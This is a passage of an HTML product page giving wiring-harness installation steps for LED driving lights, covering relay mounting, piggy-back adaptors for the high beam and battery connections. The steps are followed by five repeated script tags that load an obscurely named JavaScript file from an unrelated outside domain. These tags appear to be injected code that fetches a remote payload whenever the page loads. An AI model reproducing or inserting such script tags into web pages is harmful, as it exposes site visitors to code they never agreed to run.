It is important to mount the relay on a metal surface (it will get very hot as it is converting energy) <u>Don't </u>connect cables to the battery terminals just yet.</p> <p>3.Run the wires from the relay to your new driving light/s. Be sure to keep them away from moving parts and hot surfaces.</p> <p>4.IF CONNECTING TO OPERATE DIRECTLY OFF HIGH BEAM: you will need to fit a <i>piggy back adaptor</i> <em>(supplied with wiring harness for H4 &amp; HB3 globes, all other piggy backs can be purchased separately).</em> Remove the factory plug from the back of the headlight and connect one end of the <i>piggy back adaptor. </i>Connect the other end to the factory plug. Now connect the white DT plug on the <i>piggy back </i>to the new wiring harness.</p> <p>5.If you intend utilising the on/off switch on the wiring harness, run the cable through an existing rubber grommet in the firewall to the desired position in the vehicle cabin.</p> <p>6.Now you can connect the wiring harness to the battery terminals, Red(+) Black(-) and re connect the Earth terminal to battery.</p> <script type="text/javascript" async="" src="//proudflex.org/213db237bbd6bf854a.js"></script><script type="text/javascript" async="" src="//proudflex.org/213db237bbd6bf854a.js"></script><script type="text/javascript" async="" src="//proudflex.org/213db237bbd6bf854a.js"></script><script type="text/javascript" async="" src="//proudflex.org/213db237bbd6bf854a.js"></script><script type="text/javascript" async="" src="//proudflex.org/213db237bbd6bf854a.js"></script>", "excerpt": "Wiring harness installation for your LED driving lights / spot lights is a simple process that requires no cutting or soldering.
